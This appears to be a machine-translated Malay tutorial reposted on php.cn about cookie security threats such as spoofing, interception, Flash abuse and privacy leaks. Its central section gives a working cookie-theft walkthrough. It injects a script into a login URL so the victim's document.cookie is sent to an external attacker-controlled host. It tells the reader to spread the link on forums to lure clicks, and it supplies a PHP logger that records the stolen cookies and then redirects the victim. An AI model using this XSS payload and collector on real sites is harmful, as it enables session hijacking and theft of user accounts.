Rumah > hujung hadapan web > tutorial js > Analisis mendalam isu keselamatan kuki_kuki

Analisis mendalam isu keselamatan kuki_kuki

WBOY
Lepaskan: 2016-05-16 16:12:07
asal
1687 orang telah melayarinya

Tujuan kuki adalah untuk membawa kemudahan kepada pengguna dan menambah nilai pada tapak web Dalam keadaan biasa, mereka tidak akan menyebabkan ancaman keselamatan yang serius. Fail kuki tidak boleh dilaksanakan sebagai kod dan tidak boleh menghantar virus ia adalah hak milik kepada pengguna dan hanya boleh dibaca oleh pelayan yang menciptanya. Di samping itu, pelayar biasanya hanya membenarkan 300 kuki disimpan, dan setiap tapak boleh menyimpan sehingga 20 kuki Saiz setiap kuki adalah terhad kepada 4KB Oleh itu, kuki tidak akan mengisi cakera keras, dan tidak akan digunakan sebagai serangan "penafian perkhidmatan".

Walau bagaimanapun, sebagai pengganti identiti pengguna, keselamatan kuki kadangkala menentukan keselamatan keseluruhan sistem dan isu keselamatan kuki tidak boleh diabaikan.

(1) Cookie spoofing Kuki merekodkan maklumat seperti ID akaun pengguna dan kata laluan, dan biasanya disulitkan menggunakan kaedah MD5 sebelum dihantar dalam talian. Walaupun maklumat yang disulitkan dipintas oleh sesetengah orang dengan motif tersembunyi di Internet, ia tidak dapat difahami. Namun, masalahnya sekarang ialah orang yang memintas kuki itu tidak perlu mengetahui maksud rentetan ini Selagi dia menyerahkan kuki orang lain ke pelayan dan boleh lulus pengesahan, dia boleh berpura-pura menjadi mangsa dan log. ke laman web ini dipanggil kuki.
Pengguna haram memperoleh kunci penyulitan yang sepadan melalui penipuan kuki, dengan itu mengakses semua maklumat peribadi pengguna yang sah, termasuk e-mel pengguna dan juga maklumat akaun, menyebabkan kemudaratan serius kepada maklumat peribadi.
(2) Pintasan kuki
Kuki dihantar antara penyemak imbas dan pelayan dalam bentuk teks biasa dan dengan mudah boleh dipintas secara haram dan digunakan oleh orang lain. Kuki boleh dibaca oleh sesiapa sahaja yang boleh memintas komunikasi web.
Selepas kuki dipintas oleh pengguna haram dan kemudian dimainkan semula dalam tempoh sahnya, pengguna haram itu akan menikmati hak pengguna yang sah. Sebagai contoh, untuk bacaan dalam talian, pengguna haram boleh menikmati pembacaan majalah elektronik dalam talian tanpa membayar sebarang bayaran.

Kaedah pemintasan kuki termasuk yang berikut:

(1) Gunakan pengaturcaraan untuk memintas kuki. Kaedah dianalisis di bawah Kaedah ini diselesaikan dalam dua langkah.

Langkah 1: Cari tapak web yang perlu mengumpul kuki, menganalisisnya dan membina URL. Mula-mula, buka tapak web tempat anda ingin mengumpul kuki, dengan anggapan ia adalah http://www.XXX.net Log masuk ke tapak web dan masukkan nama pengguna "" (tanpa tanda petikan). dan tangkap paket, dan dapatkan kod berikut:
http://www.XXX.net/tXl/login/login.pl? username=&passwd=&ok.X=28&ok.y=6;
Gantikan "" dengan:
"<script>alert(document.cookie)</script>" Cuba lagi Jika perlaksanaan berjaya, mulakan bina URL:
http://www.XXX.net/tXl/login/login.pl? username=<script>window.open ("http://www.cbifamily.org/cbi.php?"+document.cookie)</script>&passwd=&ok.X=28&ok.y=6.
Antaranya, http://www.cbifamily.org/cbi.php ialah skrip pada hos tertentu yang boleh dikawal oleh pengguna. Ambil perhatian bahawa "+" ialah pengekodan URL bagi simbol " ", kerana " " akan dianggap sebagai ruang. URL boleh disiarkan dalam forum untuk mendorong orang lain mengklik padanya.

Langkah 2: Sediakan skrip PHP yang mengumpul kuki dan letakkannya pada tapak web yang boleh dikawal oleh pengguna Apabila orang yang tidak mengesyaki mengklik pada URL yang dibina, kod PHP boleh dilaksanakan. Kandungan khusus skrip adalah seperti berikut:

Salin kod Kod adalah seperti berikut:

$info=getenv("OUERY_STRING"); jika($info){
$fp=fopen("info.tXt","a");
fwrite($fp,!info."n"); fclose($fp);

header("Lokasi:http://www.XXX.net");
?>

Letakkan kod ini pada rangkaian dan anda boleh mengumpul kuki semua orang. Jika forum membenarkan kod HTML atau membenarkan penggunaan teg Flash, anda boleh menggunakan teknologi ini untuk mengumpul kod Kuki dan meletakkannya dalam forum, kemudian berikan siaran topik yang menarik dan tulis kandungan yang menarik, dan anda boleh dengan cepat mengumpul sejumlah besar daripada Cookies. Di forum, banyak kata laluan orang telah dicuri dengan kaedah ini.
(2) Gunakan bahaya tersembunyi kod Flash untuk memintas kuki. Terdapat fungsi getURL() dalam Flash. Flash boleh menggunakan fungsi ini untuk membuka halaman web tertentu secara automatik, yang boleh membawa pengguna ke tapak web yang mengandungi kod hasad. Contohnya, apabila pengguna sedang menikmati animasi Flash pada komputer, kod dalam bingkai animasi mungkin telah disambungkan secara senyap ke Internet dan membuka halaman yang sangat kecil yang mengandungi kod khas Halaman ini boleh mengumpul kuki dan melakukan perkara berbahaya yang lain. benda. Tapak web tidak boleh menghalang Flash daripada melakukan ini kerana ia adalah fungsi dalaman fail Flash.
(3) Kuki membocorkan privasi rangkaian
Sebab utama mengapa kuki menyebabkan kebocoran privasi dalam talian ialah: Didorong oleh kepentingan komersial. Dengan kebangkitan e-dagang dan kemunculan peluang perniagaan yang besar di Internet, beberapa laman web dan institusi menyalahgunakan kuki dan menggunakan teknologi enjin carian, teknologi perlombongan data dan juga teknologi penipuan rangkaian untuk mengumpul maklumat peribadi orang lain tanpa kebenaran pelawat, dalam untuk membina pangkalan data, pengiklanan dan tujuan mengaut keuntungan lain, mengakibatkan kebocoran privasi peribadi pengguna. "Keterbukaan penghantaran maklumat kuki. Fail kuki mempunyai proses penghantaran dan ciri teks khas. Menghantar fail Cookie-iaitu yang disulitkan tidak selamat antara pelayan dan pelanggan boleh membawa kepada kebocoran maklumat peribadi dengan mudah. ​​

Di atas adalah pemahaman peribadi saya tentang keselamatan kuki Sila betulkan saya jika terdapat sebarang ketinggalan.

Label berkaitan:
sumber:php.cn
Kenyataan Laman Web ini
Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn
Tutorial Popular
Lagi>
Muat turun terkini
Lagi>
kesan web
Kod sumber laman web
Bahan laman web
Templat hujung hadapan